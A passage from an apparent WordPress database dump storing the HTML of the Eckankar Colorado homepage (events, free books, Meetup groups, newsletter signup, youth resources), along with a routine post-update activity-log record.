data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236814,40261,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2-300-height.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236813,40261,'post_title','Home'),(236812,40261,'post_type','page'),(236809,40260,'_server_remote_addr','76.130.120.x'),(236810,40260,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236811,40261,'post_id','7160'),(236806,40260,'_user_id','2'),(236807,40260,'_user_login','S8zhaBda'),(236808,40260,'_user_email','nada@zipnadanot.org'),(236805,40260,'_message_key','post_updated'),(242987,41195,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" 